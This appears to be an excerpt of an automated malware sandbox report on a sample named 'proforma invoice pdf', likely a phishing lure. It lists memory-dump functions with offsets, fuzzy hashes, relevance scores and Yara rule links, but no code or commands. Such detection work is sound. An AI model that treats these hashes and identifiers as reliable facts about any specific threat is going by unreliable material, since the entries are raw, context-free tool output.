GetModuleHandleW.KERNEL32(00000000), ref: 02C8BDA6

Memory Dump Source

Source File: 00000000.00000002.1479551668.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_proforma invoice pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bde5b851abb7da4a2f7184f35b47307f87ef45fbe1ac85ada739b30fb0374a30
Instruction ID: b6580241df4d2912102c6259dc3fa59f35aaad444a362fa9535dc80f88189758
Opcode Fuzzy Hash: bde5b851abb7da4a2f7184f35b47307f87ef45fbe1ac85ada739b30fb0374a30
Instruction Fuzzy Hash: 7B110FB6C002499FDB20DF9AC444ADEFBF4EF88318F14842AD818A7200D379A945CFA5

Function 0534BDE8 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7e4997522ad2e969a5acf826b573ded4bbdb8757b6cb8a64fbfec840299574
Instruction ID: 4d09c7e3e9b1a8a5091866f9b7d3afa17039ab21e33e5107752a53ea6f30a2a8
Opcode Fuzzy Hash: bb7e4997522ad2e969a5acf826b573ded4bbdb8757b6cb8a64fbfec840299574
Instruction Fuzzy Hash: 2F612C35B041199FCF14DF68D858AADBBF6BB88711F148069E902A73A1DB71EC418FA0

Function 0534F331 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99cbbba7c0bbccb31113e7a0afc1c61f41ca9112a7524e8d413f2fa8ced0e76d
Instruction ID: 19c1f2977caaa28a1319241a78eaa7ac3aaa95a33fd07472d451d48c1e7f8bed
Opcode Fuzzy Hash: 99cbbba7c0bbccb31113e7a0afc1c61f41ca9112a7524e8d413f2fa8ced0e76d
Instruction Fuzzy Hash: E1510475A00619DFCB25DF68C484AA9B7B1FF49310F158195E909AB364CB30FD92CF90

Function 0534C6AF Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72f629eac1c6ed13d25559eec125282da765cb261460f099fe1bd9ff20008339
Instruction ID: 668a13ab8edeb5fb705e42fa8bd11b90a1c2fa848ea5b8c758fc6920d604ba15
Opcode Fuzzy Hash: 72f629eac1c6ed13d25559eec125282da765cb261460f099fe1bd9ff20008339
Instruction Fuzzy Hash: 72412734B10219DFDB15DF64D859AAE7BB7FF88610F18802AF802D72A0DB749C56DB90

Function 0534F35A Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ec3b5ebf15c8f30bede7df8a41cfab563516b0475f449726121cb4a3dd50f2
Instruction ID: 9c803b1192a25906a025ed895cdc4cdb8cc451b0e15e99eacc79ba447717e10c
Opcode Fuzzy Hash: b5ec3b5ebf15c8f30bede7df8a41cfab563516b0475f449726121cb4a3dd50f2
Instruction Fuzzy Hash: FD41B275A00219DFDB64DF68C884AADB7B1BF49310F158195E909A7364CB31FD92CF90

Function 0534B9F1 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac6ca10fdc135239c501e3fd15703cfba1cc554b6eb61f32c0c5fcf2f32f5555
Instruction ID: 0a23e7e09b2441ca57280df13fdba882fcedd79492b1ce77d6df16d18c9d0b41
Opcode Fuzzy Hash: ac6ca10fdc135239c501e3fd15703cfba1cc554b6eb61f32c0c5fcf2f32f5555
Instruction Fuzzy Hash: E521F630A04204BFEB44DBB4DC16BAE7BBAEF84300F54C466F506DB2C1DE34A9058BA1

Function 0114D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1478800015.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_114d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130db8fb54137972a93914563fb590d557b590de08afe833869eafedac57126b
Instruction ID: c5625a8455a5dd3bab9a54a5059b50278a072fccc867a6cbbc20a100fa3d1730
Opcode Fuzzy Hash: 130db8fb54137972a93914563fb590d557b590de08afe833869eafedac57126b
Instruction Fuzzy Hash: A42136B2500200DFDF19DF54E9C0B56BB65FB94724F28C16CE9090F656C336E456CAA2

Function 0114D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1478800015.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_114d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c56f0b90d22fe9957497372d2e4f7da9cf27b479698f4c4c807fb70447e1a6f
Instruction ID: eb71be2f5ed34ef1a5a723b152cfd23c03c35d5a0c2e04ad940ae2de79b8e5b8
Opcode Fuzzy Hash: 8c56f0b90d22fe9957497372d2e4f7da9cf27b479698f4c4c807fb70447e1a6f
Instruction Fuzzy Hash: 17212172600200EFDF19DF54E9C0B26BF71FB98718F248569E9090F256C736D416CAA2

Function 0534BA00 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2084effe1200a884effebc354227cee4f89c03ceb2fb5bb77ec03a5e5efd49
Instruction ID: 1fd407f3b1aee721cab5b0854a2f2e77e4cc38f3f545b29e3b0c61552de8f8d4
Opcode Fuzzy Hash: 6e2084effe1200a884effebc354227cee4f89c03ceb2fb5bb77ec03a5e5efd49
Instruction Fuzzy Hash: C521F630A04204AFEB44DB74DC15BAEBBBBEF84300F50C466E506DB191DE30AD058BA1

Function 011AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1478899305.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11ad000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca6eef070cbedd850103f9d7c160419bb8d6109cce22577e3b4c86fca55ee70
Instruction ID: 626d7eb57dc2624e01193b99bf911fa41e0e21558f4f548d30f5e229bb11564f
Opcode Fuzzy Hash: 3ca6eef070cbedd850103f9d7c160419bb8d6109cce22577e3b4c86fca55ee70
Instruction Fuzzy Hash: 0D210379544700DFDF19DF64EA80B26BF61EB84314F60C56DE80A4B692C336D407CA62

Function 011AD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1478899305.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11ad000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 057b704c526923c1fba00f894c168b14e60c096e7869892cff37abea6270d6dd
Instruction ID: a49edd2d4691cbba0b613717a6e47e65c4e7f72388235611811f6d807a259c17
Opcode Fuzzy Hash: 057b704c526923c1fba00f894c168b14e60c096e7869892cff37abea6270d6dd
Instruction Fuzzy Hash: DE21F579504600EFDF19DFA4E5C0B25BF65FB84324F60C56EE90A4B692C336D846CA62

Function 0534C210 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d621a732b4b005b5dfd36a3c1e8f4aafaee612a39ef1dd7aa2bf2f643e5c9d67
Instruction ID: 9732658f32584509232f17d1a4b0d24c6aa829fce5c1a073f54b06bc3621aa74
Opcode Fuzzy Hash: d621a732b4b005b5dfd36a3c1e8f4aafaee612a39ef1dd7aa2bf2f643e5c9d67
Instruction Fuzzy Hash: 5E216035B0520A8FCF14DFA8C888A6E7BF1FF45210F1544A6E905DB362D670EC41CB61

Function 0534ADD0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee14ca7293f175a0f64db0d8edb5ca5880c24bc1ef31501fc31be92b4d92e1f
Instruction ID: abfe477fe8f6f20e9fb4c445ed20fcc9c9264674de5707b77d6e41d06e8cb1c8
Opcode Fuzzy Hash: bee14ca7293f175a0f64db0d8edb5ca5880c24bc1ef31501fc31be92b4d92e1f
Instruction Fuzzy Hash: E921AEB0D01219DFDB44CFAAC540AEEBBF2BF89301F2085AAD425B7250D7359A81DF94

Function 0534BDDA Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e18ab487dbb66a64f00d0dca63750432e9779ca09e4300b980e9ffffbc988727
Instruction ID: 8b4375d2249cc8968822b5bdba87fef54a2b01f51ddcd8b1042beb39f8b25f3e
Opcode Fuzzy Hash: e18ab487dbb66a64f00d0dca63750432e9779ca09e4300b980e9ffffbc988727
Instruction Fuzzy Hash: FE210C31A001089FCF04DFA4D858AEDBBF6FB88320F149069E906B7261DB71AD55CFA1

Function 011AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1478899305.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11ad000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af7ef8e6f82ef8f05f130abf6f42b22202b7fa014132d1be7284217eaeb7b5f3
Instruction ID: fc12c99c82684eefb67826f50eb482b2ea1ab6568aacb406e0207fa67a4653a2
Opcode Fuzzy Hash: af7ef8e6f82ef8f05f130abf6f42b22202b7fa014132d1be7284217eaeb7b5f3
Instruction Fuzzy Hash: 1821B0754487809FCB06CF24DA94711BF71EF46214F28C5DAD8498F6A7C33A980ACB62

Function 0114D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1478800015.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_114d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: 2c5790de84067576f88d6423c894574a1ca99da0329ee5890ee137b882c39b4e
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: F611CDB6404240DFDF16CF54E5C0B56BF61FB94324F2886A9D9090BA57C33AE456CBA2

Function 0114D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1478800015.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_114d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: a904178a989a464df1d7d1e36b322c4615dd6f97e5fd22f114e353037fec3305
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: 5411CD72504280DFCF16CF54E5C0B16BF71FB94714F2486A9D8090F656C336D456CBA2

Function 011AD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1478899305.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11ad000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: 548e58ce2c7916779561b82ae9416ceb17cebbef1634d23912927bd891e96f42
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 8D11BE79504640DFDF16CF54D5C4B15FF61FB84324F24C6AAD8494BAA6C33AD40ACB52

Function 0114D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1478800015.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_114d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 968fad3e6682f1dd27baac953c6cda0aa0ae02207c92da1d620c8de3c62ecf9c
Instruction ID: cca12a3cea86ff832ec726e09e32c1d15b6d15a4fe0e94861f570fe09dddce8e
Opcode Fuzzy Hash: 968fad3e6682f1dd27baac953c6cda0aa0ae02207c92da1d620c8de3c62ecf9c
Instruction Fuzzy Hash: 9901F7314047809BFF288FA9DD88B66BF98DF51A29F04855AED080F282C3399440CAB3

Function 0114D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1478800015.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_114d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d142a0ad4e82a9b85fe3b31355ae201995afaa172289405d34995e8b9d6d60b
Instruction ID: 71ce9aae051eb3d0dbaf30ae2b0a1b022476b9469e983a824256b4093d7d25dc
Opcode Fuzzy Hash: 8d142a0ad4e82a9b85fe3b31355ae201995afaa172289405d34995e8b9d6d60b
Instruction Fuzzy Hash: EEF0AF31404684AFEB248E59D888B62FF98EB51628F18C15AED480F287C3799844CBA2

Function 0534C1FF Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fa36d21caa549ce811a90ad8b39344cd4250121c9b76377c5f3472c41771a07
Instruction ID: 880f01c71543d2eb49c0453a8b212d6e455a28db030bcb98ddb7982ef66c1b97
Opcode Fuzzy Hash: 4fa36d21caa549ce811a90ad8b39344cd4250121c9b76377c5f3472c41771a07
Instruction Fuzzy Hash: 4BE0D836642209ABDF105AE1EC8DBD6BFECF755271F044832EA02C3152D6B5A55AC660

Non-executed Functions

Function 05920278 Relevance: 3.1, Strings: 2, Instructions: 586COMMON

Download Yara Rule

Strings

(oq, xrefs: 05920731
(oq, xrefs: 05920725

Memory Dump Source

Source File: 00000000.00000002.1484602961.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5920000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: (oq$(oq
API String ID: 0-1396055846
Opcode ID: bc00ddde5dea2eb76ef5e6934d40afbace8f00714ac3459d219c2dfa2f6d1a8c
Instruction ID: 6c1b14b2c9a99fbcdda2949f152c7eb62a17f81312d4b7de370000b69928ecbc
Opcode Fuzzy Hash: bc00ddde5dea2eb76ef5e6934d40afbace8f00714ac3459d219c2dfa2f6d1a8c
Instruction Fuzzy Hash: DD22A130B00225CFDB19DF69D498A6E7BB6FF89200F198469E406DB3A5DB35EC41CB91

Function 073024DE Relevance: 2.7, Strings: 2, Instructions: 238COMMON

Download Yara Rule

Strings

Teq, xrefs: 07302D3F
xbq, xrefs: 07302618

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: Teq$xbq
API String ID: 0-1834090110
Opcode ID: 63f622f94f56412d69521bb8e3f98cb2f4d0a3993ece2d431b27d07826130d4e
Instruction ID: 9184a651dc1200a2f4fc784c5c8c5ca5037cefc2434c37bedfc5fcb96058aac2
Opcode Fuzzy Hash: 63f622f94f56412d69521bb8e3f98cb2f4d0a3993ece2d431b27d07826130d4e
Instruction Fuzzy Hash: EEB173B5E006288FDB58DF6AC954ADDBBF2BF88305F14C1A9D409AB364DB305A85CF50

Function 0730D2C0 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

0:, xrefs: 0730D31B

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: 0:
API String ID: 0-4251567601
Opcode ID: 77e2cf07bcd0fd0d53fa64b53e402ea62bcc173f4e361e51e68454e529183e26
Instruction ID: 7c42b147e921228e7d78f04ed0f4de2fdb3cdfc8a60ca47544edbe60ad9b8c46
Opcode Fuzzy Hash: 77e2cf07bcd0fd0d53fa64b53e402ea62bcc173f4e361e51e68454e529183e26
Instruction Fuzzy Hash: 4CE10BB4E106198FDB14DF99C590AAEFBF2FF89305F248169D818AB355D730A941CFA0

Function 07301DF1 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

4'q, xrefs: 07301ED2

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: d6045db54d483af77701e8d75ea2d4555f88994713f8a0876ab79316117e6174
Instruction ID: 122985fe688515f2687cabd141486dd4c7e1276d9e5c8dcc73aff487938743d5
Opcode Fuzzy Hash: d6045db54d483af77701e8d75ea2d4555f88994713f8a0876ab79316117e6174
Instruction Fuzzy Hash: 07610AB4D103199BD71DDF7AE85168ABBF3FB88204F04C62AE0049B268EF7059069B41

Function 07301E00 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4'q, xrefs: 07301ED2

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 6652cdba6dfceeeef0dcfa9568d921490a018c207cf77a005841c764957a1e52
Instruction ID: 8b91992fa4e3844c355afe7b7afd28f332a8a56c44e367db7d52d04d4945b6d8
Opcode Fuzzy Hash: 6652cdba6dfceeeef0dcfa9568d921490a018c207cf77a005841c764957a1e52
Instruction Fuzzy Hash: 5361EBB4D103199BE71DDF7AE84169ABFF3FB88204F14C62AE0049B268EF7059069B50

Function 0730D2B0 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

0:, xrefs: 0730D31B

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: 0:
API String ID: 0-4251567601
Opcode ID: 6d83c1f95657c77cec750e2e3a612e63985509a6a3cc3175406cb148cbdf1afb
Instruction ID: dba3bc153ecde502466fa5600dd4ac30a11568da640fa5328af9c67a8448279b
Opcode Fuzzy Hash: 6d83c1f95657c77cec750e2e3a612e63985509a6a3cc3175406cb148cbdf1afb
Instruction Fuzzy Hash: 10510BB4E142198FDB14DFA9C9805AEFBF2EF89304F24C1AAD418AB355D7319941CFA1

Function 0730CE73 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66db153c37871a1158374cb04fe0d6b2c9aeb4756e52f151e098807dbca56961
Instruction ID: aa3d3d094fcffe75fa142ebb977816d21bd0b84ff73a0f613a1691b33fce7cb7
Opcode Fuzzy Hash: 66db153c37871a1158374cb04fe0d6b2c9aeb4756e52f151e098807dbca56961
Instruction Fuzzy Hash: A9E10AB4E142198FDB14DFA9C590AAEFBF2BF89304F24C159D818AB355D730A941CFA1

Function 05350E08 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483746210.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5350000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6efeaae570569b5636628ac6b9dd75542413ffd611d159353c38f5e28fe46772
Instruction ID: 3dbb85baf8fe9649b06ee5248129422628260adbd00fe5a34c1cf2a179c86eaf
Opcode Fuzzy Hash: 6efeaae570569b5636628ac6b9dd75542413ffd611d159353c38f5e28fe46772
Instruction Fuzzy Hash: 731293B0C81745CBE710CF65F94C2893BB1BB89328FD44A09D2616B3E5DBB9196ACF44

Function 0730D6F8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3e4d445b4424ad38eef5d6d714545334e37f09990421c9fe50354c4ffbf255a
Instruction ID: 2ca33f6315f83f479993edcb72f49e42d37bc105cd6302c5f0f6623875bd3071
Opcode Fuzzy Hash: e3e4d445b4424ad38eef5d6d714545334e37f09990421c9fe50354c4ffbf255a
Instruction Fuzzy Hash: 7CE1EBB4E142198FDB14DFA9C590AAEFBF2BF89305F24C159D818AB355D730A941CFA0

Function 0730F270 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a002fbe0a6d40459f32c7721eabfee9874f2a6be7000e3a49d1a9e29cb68b16
Instruction ID: 24fba114b992dbff35206160a006d4a812d342033daa2b0aa44bd3c5e6b39d80
Opcode Fuzzy Hash: 0a002fbe0a6d40459f32c7721eabfee9874f2a6be7000e3a49d1a9e29cb68b16
Instruction Fuzzy Hash: 95E10FB4E0421A8FDB24DF99C590AAEFBB2FF49305F24C159D818AB355D731A941CFA0

Function 0730E998 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd239f5dfc36c46ac0eea8b09ecdf968af83eaaa153800bdb060cfd1a0c8c697
Instruction ID: 76a6754c1704a3d20d0763f5bcfad179757962f70e82ada416fa1983fff16976
Opcode Fuzzy Hash: fd239f5dfc36c46ac0eea8b09ecdf968af83eaaa153800bdb060cfd1a0c8c697
Instruction Fuzzy Hash: 9EE11CB4E042198FDB14DFA9C590AAEFBB2FF89304F24C559D818AB355D731A941CFA0

Function 0534A810 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ef7d499913db669a550c32d18c7c29ad52fb4b07f10b5e27dda5880a452f056
Instruction ID: 29b880583fc7c7387bd892cea32fa3182a657a9fd7cdda08c670535dfc38505f
Opcode Fuzzy Hash: 8ef7d499913db669a550c32d18c7c29ad52fb4b07f10b5e27dda5880a452f056
Instruction Fuzzy Hash: C7D11835D2071ACADB14EB64D890AD9B7B1FF95300F50879AE0493B215FF706AC9CB91

Function 0534A820 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c35f32143caf914e2b045d819bec693db9738b1876ec556bf66f243159cbccb
Instruction ID: 77e2fcdd69f75a88fb4d1889ca43d5625fd812a37c727192f54c30d410329a84
Opcode Fuzzy Hash: 0c35f32143caf914e2b045d819bec693db9738b1876ec556bf66f243159cbccb
Instruction Fuzzy Hash: CAD11735D2071ACADB14EB64D890AD9B7B1FF99300F50879AE0493B215FF706AC9CB91

Function 05350040 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483746210.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5350000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a44c3453f9cdd97e8e586ac3e1353ac2e890f21fafefd3470b745974091ea3
Instruction ID: 31a713feb0fd5be33e5d2ea2d2a0612f210e28d4e2f28aba414e13b056acdf62
Opcode Fuzzy Hash: 43a44c3453f9cdd97e8e586ac3e1353ac2e890f21fafefd3470b745974091ea3
Instruction Fuzzy Hash: 73A17032E002158FCF09DFB4C8449EEBBB2FF85314B15856AE906AB255DBB1E955CF80

Function 05350DFA Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483746210.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5350000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75186dcb9936fd494db782aaeb33f501903cf28d145d46a718983d76c0436ccc
Instruction ID: 5845e663047d647f207e49d1fc8943b65865095019cfad31f54f72a1b6bf0b57
Opcode Fuzzy Hash: 75186dcb9936fd494db782aaeb33f501903cf28d145d46a718983d76c0436ccc
Instruction Fuzzy Hash: 73C1F7B1C81745CBE710CF69F8482897BB1BB89328F944B19D1616F3E4DBB419AACF44

Function 0592B4D0 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484602961.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5920000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
